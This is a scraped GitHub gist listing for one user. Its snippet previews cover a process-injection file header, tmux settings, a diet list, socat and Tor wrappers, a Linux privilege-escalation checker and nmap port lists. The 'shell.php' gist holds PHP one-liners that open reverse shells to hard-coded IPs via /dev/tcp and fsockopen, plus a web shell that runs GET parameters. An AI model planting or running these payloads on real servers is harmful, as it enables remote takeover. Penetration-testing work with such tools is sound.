Skip to content

Instantly share code, notes, and snippets.

@podjackel
podjackel / inject.c
Created May 8, 2018 19:56 — forked from hfiref0x/inject.c
Process Doppelgänging
//
// Ref = src
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
//
// Credits:
// Vyacheslav Rusakov @swwwolf
// Tom Bonner @thomas_bonner
//
#include <Windows.h>
##Custom TMUX settings
# 0 is too far from ` ;)
set -g base-index 1
#Set colors to work
set -g default-terminal "screen-256color"
#Remap Prefix to screens
set -g prefix C-a
bind C-a send-prefix
@podjackel
podjackel / Bulletproof_foods.md
Last active March 7, 2021 23:58 — forked from JamesDullaghan/Bulletproof_foods.md
Dave Aspreys bulletproof diet food list
#!/bin/sh
#Add associative array here for git repos to pull/update
main() {
searchsploit -u > log-searchsploit &
#aliases
alias ipgrep='grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"'
alias ll='ls -lah'
@podjackel
podjackel / soxify
Created August 29, 2018 01:03 — forked from darkerego/soxify
Soxify - Socat Wrapper for Socks5 Proxies/Tor
#!/bin/sh
# ./socatchk remote-host remote-port
# crudely shutsdown socat (if running) and then restarts it for new host/port
orport=9050
orlisadr=127.0.0.1
case $1 in
-k|--kill)
for i in $(ls /tmp/soxify*.pid);do
echo 'Killing pid...'
#!/usr/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
@podjackel
podjackel / shell.php
Last active January 4, 2023 20:16 — forked from rshipp/shell.php
A tiny PHP/bash reverse shell.
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ?>
<?php $sock=fsockopen("10.11.0.150",443); exec("/bin/sh -i <&3 >&3 2>&3"); ?>
<?php $output = shell_exec($_GET["cmd"]);echo "<pre>$output</pre>";?>
@podjackel
podjackel / dht-walkthrough.md
Created September 26, 2018 15:40 — forked from gubatron/dht-walkthrough.md
DHT walkthrough notes

DHT Walkthrough Notes

I've put together these notes as I read about DHT's in depth and then learned how the libtorrent implementation based on the Kademlia paper actually works.

What problem does this solve?

400,000,000,000 (400 billion stars), that's a 4 followed by 11 zeros. The number of atoms in the universe is estimated to be around 10^82. A DHT with keys of 160 bits, can have 2^160 possible numbers, which is around 10^48

@podjackel
podjackel / gist:31d51e8e59ea69c7af7a552d605980e0
Last active February 11, 2020 18:31 — forked from vincentbernat/gist:4391597
socat as an SSH reverse proxy (or anything TCP-based)
local$ socat TCP-LISTEN:2222,bind=127.0.0.1,reuseaddr,fork TCP-LISTEN:2223,reuseaddr
local$ ssh -p 2222 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no localhost
remote$ socat TCP:10.0.2.2:2223 TCP:127.0.0.1:22

nmap --top-ports <#ports> -v -oG - localhost

Top 100:

7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157

Top 1000: